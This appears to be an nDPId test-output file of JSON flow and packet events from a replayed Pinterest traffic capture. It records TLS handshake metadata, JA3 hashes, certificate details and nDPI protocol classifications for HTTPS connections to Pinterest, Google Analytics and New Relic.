-00612{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15567,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289732959,"flow_last_seen":1605289732959,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289732959,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15567,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1605289732959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289732959,"pkt":"qtsDr8lk5EKm5WPyht1gBE+4ACgGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElpIBuyNNp7gAAAAAoAL9IOnRAAACBAWgBAIICtZiaYQAAAAAAQMDBw=="} -00620{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":15691,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289732972,"flow_last_seen":1605289732972,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289732972,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15691,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1605289732972,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289732972,"pkt":"qtsDr8lk5EKm5WPyht1gD7s\/ACgGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAOsEYBuwu8HIoAAAAAoAL9IMybAAACBAWgBAIIClhuYDIAAAAAAQMDBw=="} 
-00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15845,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":2,"flow_last_seen":1605289733005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733005,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoETkIAHQAAAAAAAAAAAIQqAcsBIEmLB5kd7IUo3\/YpAbuWkkELYhojTae5oBJXgL46AAACBAV4AQMDAwQCCArCuWtz1mJphA=="} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15850,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":3,"flow_last_seen":1605289733005,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289733005,"pkt":"qtsDr8lk5EKm5WPyht1gBE+4ACAGQCoBywEgSYsHmR3shSjf9ikqBE5CAB0AAAAAAAAAAACElpIBuyNNp7lBC2IbgBAB+0IeAAABAQgK1mJpssK5a3M="} -00958{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15854,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289732959,"flow_last_seen":1605289733006,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733006,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15960,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1605289733019,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733019,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPSoAFFBABwgKAAAAAAAAIA4qAcsBIEmLB5kd7IUo3\/YpAbuwRmgG99MLvByLoBJXgOQ\/AAACBAV4AQMDAwQCCArCuWuDWG5gMg=="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15964,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1605289733019,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289733019,"pkt":"qtsDr8lk5EKm5WPyht1gD7s\/ACAGQCoBywEgSYsHmR3shSjf9ikqABRQQAcICgAAAAAAACAOsEYBuwu8HItoBvfUgBAB+2giAAABAQgKWG5gYcK5a4M="} -00974{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":15967,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289732972,"flow_last_seen":1605289733019,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733019,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.google-analytics.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01014{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16214,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289732959,"flow_last_seen":1605289733059,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":1905,"flow_avg_l4_payload_len":317,"midstream":0,"thread_ts_msec":1605289733059,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -02795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16230,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1605289732959,"flow_last_seen":1605289733060,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1388,"flow_tot_l4_payload_len":5839,"flow_avg_l4_payload_len":530,"midstream":0,"thread_ts_msec":1605289733060,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a04:4e42:1d::84","src_port":38546,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Pinterest","breed":"Fun","category":"SocialNetwork"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"assets.pinterest.com","server_names":"*.pinterest.com,pinterest.in,*.pinterest.co,pinterest.co,*.pinterest.pe,pinterest.pe,*.pinterest.be,pinterest.be,*.pinterest.in,*.pinterest.ph,*.pinterest.ec,pinterest.ph,*.pinterest.cl,*.pinimg.com,*.pinterest.es,pinterest.es,*.pinterest.nz,pinterest.nz,pinterest.ec,pinterest.hu,pinterest.ca,pinterest.id,*.pinterest.nl,pinterest.nl,*.pinterest.tw,pinterest.tw,*.pinterest.th,pinterest.th,*.pinterest.id,*.pinterest.vn,*.pinterest.hu,pinterest.vn,*.pinterest.uk,pinterest.uk,*.pinterest.ru,pinterest.ru,*.pinterest.it,pinterest.it,pinterest.fr,pinterest.cl,*.pinterest.fr,*.pinterest.jp,*.pinterest.ca,pinterest.com,pin.it,*.pinterest.se,*.pinterest.pt,*.pinterest.mx,*.pinterest.kr,*.pinterest.ie,pinterest.engineering,*.pinterest.dk,*.pinterest.de,*.pinterest.ch,*.pinterest.at,*.pinterestmail.com,*.pinterest.engineering,*.pinterest.info,pinterest.info,pinimg.com,pinterestmail.com,pinterest.de,pinterest.dk,pinterest.ie,pinterest.jp,pinterest.kr,pinterest.mx,pinterest.pt,pinterest.se,pinterest.at,pinterest.ch,pinterest.co.at,*.pinterest.com.uy,pinterest.co.kr,pinterest.co.uk,*.pinterest.com.au,pinterest.com.au,pinterest.com.mx,*.pinterest.co.nz,pinterest.co.nz,pinterest.com.pe,pinterest.com.uy,*.pinterest.co.in,pinterest.com.py,*.pinterest.com.py,pinterest.com.bo,*.pinterest.com.bo,pinterest.com.ec,*.pinterest.com.ec,pinterest.co.in,*.pinterest.com.pe,*.pinterest.com.mx,pinterest.com.vn,*.pinterest.com.vn,*.pinterest.co.uk,*.pinterest.co.kr,*.pinterest.co.at,*.testing.pinterest.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert SHA2 High Assurance Server CA","subjectDN":"C=US, ST=California, L=San Francisco, O=Pinterest, Inc., 
CN=*.pinterest.com","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"1E:D0:5D:9F:0D:82:46:B3:60:5F:11:FB:64:D5:28:35:37:40:7A:4E"}} -01015{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":16506,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289732972,"flow_last_seen":1605289733177,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":1725,"flow_avg_l4_payload_len":287,"midstream":0,"thread_ts_msec":1605289733177,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"},"tls": {"version":"TLSv1.3","client_requested_server_name":"www.google-analytics.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"eb1d94daa7e0344597e756a1fb6e7054","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00614{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":17592,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1605289733399,"flow_last_seen":1605289733399,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1605289733399,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17592,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1605289733399,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733399,"pkt":"qtsDr8lk5EKm5WPyht1gBe6sACgGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXpunLIBuwBxlgkAAAAAoAL9IKzvAAACBAWgBAIICsW6TI0AAAAAAQMDBw=="} -00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17595,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":2,"flow_last_seen":1605289733420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1605289733420,"pkt":"5EKm5WPyqtsDr8lkht1gAAAAACgGPQBk\/5sAAAAAAAAAAJdlem4qAcsBIEmLB5kd7IUo3\/YpAbucsmOjoioAcZYKoBJXgB0AAAACBAV4AQMDAwQCCArCuW0jxbpMjQ=="} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":17596,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":3,"flow_last_seen":1605289733420,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1605289733420,"pkt":"qtsDr8lk5EKm5WPyht1gBe6sACAGQCoBywEgSYsHmR3shSjf9ikAZP+bAAAAAAAAAACXZXpunLIBuwBxlgpjo6IrgBAB+6D8AAABAQgKxbpMosK5bSM="} 
-00942{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":17597,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1605289733399,"flow_last_seen":1605289733421,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1605289733421,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00998{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17600,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1605289733399,"flow_last_seen":1605289733466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":1565,"flow_avg_l4_payload_len":260,"midstream":0,"thread_ts_msec":1605289733466,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 
-02863{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":17606,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1605289733399,"flow_last_seen":1605289733468,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":5757,"flow_avg_l4_payload_len":479,"midstream":0,"thread_ts_msec":1605289733468,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"},"tls": {"version":"TLSv1.2","client_requested_server_name":"js-agent.newrelic.com","server_names":"f4.shared.global.fastly.net,*.500px.com,*.500px.net,*.500px.org,*.acceptance.habitat.sh,*.api.swiftype.com,*.art19.com,*.brave.com,*.chef.co,*.chef.io,*.cookpad.com,*.evbstatic.com,*.eventbrite.com,*.experiencepoint.com,*.fs.pastbook.com,*.fs.quploads.com,*.ftcdn.net,*.fubo.tv,*.getchef.com,*.githash.fubo.tv,*.habitat.sh,*.inspec.io,*.issuu.com,*.isu.pub,*.jimdo-dev-staging.com,*.jimdo-stable-staging.com,*.lulus.com,*.mansion-market.com,*.marfeel.com,*.massrel.io,*.meetu.ps,*.meetup.com,*.meetupstatic.com,*.newrelic.com,*.opscode.com,*.perimeterx.net,*.production.cdn.art19.com,*.staging.art19.com,*.staging.cdn.art19.com,*.swiftype.com,*.tissuu.com,*.video.franklyinc.com,*.wikihow.com,*.worldnow.com,500px.com,500px.net,500px.org,a1.awin1.com,acceptance.habitat.sh,api.swiftype.com,app.birchbox.com,app.staging.birchbox.com,app.staging.birchbox.es,art19.com,brave.com,cdn-f.adsmoloco.com,cdn.evbuc.com,cdn.polyfills.io,chef.co,chef.io,content.gamefuel.info,evbuc.com,experiencepoint.com,fast.appcues.com,fast.wistia.com,fast.wistia.net,fast.wistia.st,fubo.tv,getchef.com,githash.fubo.tv,habitat.sh,hbbtv.6play.fr,houstontexans.com,insight.atpi.com,inspec.io,jimdo-dev-staging.com,jimdo-stable-staging.com,li
nk.sg.booking.com,mansion-market.com,media.bunited.com,meetu.ps,meetup.com,meetupstatic.com,onairhls.malimarcdn.net,opscode.com,perimeterx.net,polyfill.webservices.ft.com,qa.polyfills.io,raiders.com,s.sg.booking.com,s.swiftypecdn.com,static.birchbox.com,swiftype.com,viverepiusani.it,wikihow.com,wistia.com,www.dwin2.com,www.houstontexans.com,www.raiders.com,www.wada-ama.org","ja3":"b32309a26951912be7dba376398abc3b","ja3s":"16c0b3e6a7b8173c16d944cfeaeee9cf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=BE, O=GlobalSign nv-sa, CN=GlobalSign CloudSSL CA - SHA256 - G3","subjectDN":"C=US, ST=California, L=San Francisco, O=Fastly, Inc., CN=f4.shared.global.fastly.net","alpn":"h2,http\/1.1","tls_supported_versions":"GREASE,TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"BE:28:82:77:5B:06:41:1F:70:84:BD:A4:B9:FB:F0:BC:B1:B5:E3:A0"}} -00676{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289712203,"flow_last_seen":1605289712420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:807::200a","src_port":40876,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00620{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289712203,"flow_last_seen":1605289712420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:807::200a","src_port":40876,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00709{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1605289714558,"flow_last_seen":1605289715083,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":7864,"flow_avg_l4_payload_len":191,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2600:1901::7a0b::","src_port":47032,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} -00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":126,"flow_first_seen":1605289717548,"flow_last_seen":1605289731068,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2450,"flow_tot_l4_payload_len":49723,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::200d","src_port":40894,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": 
{"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} -00740{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":61,"flow_first_seen":1605289732972,"flow_last_seen":1605289733399,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1208,"flow_tot_l4_payload_len":24849,"flow_avg_l4_payload_len":407,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:80a::200e","src_port":45126,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Advertisement"}} -00713{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1605289733399,"flow_last_seen":1605289733529,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1048,"flow_tot_l4_payload_len":18931,"flow_avg_l4_payload_len":394,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"64:ff9b::9765:7a6e","src_port":40114,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Media"}} 
-00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726574,"flow_last_seen":1605289726621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51446,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289726574,"flow_last_seen":1605289726621,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51446,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} 
-00621{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1605289718347,"flow_last_seen":1605289718378,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51472,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00734{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":17657,"source":"pinterest.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":224,"flow_first_seen":1605289715133,"flow_last_seen":1605289716126,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":31408,"flow_tot_l4_payload_len":306085,"flow_avg_l4_payload_len":1366,"midstream":0,"thread_ts_msec":1605289734948,"l3_proto":"ip6","src_ip":"2a01:cb01:2049:8b07:991d:ec85:28df:f629","dst_ip":"2a00:1450:4007:816::2003","src_port":51582,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"}} 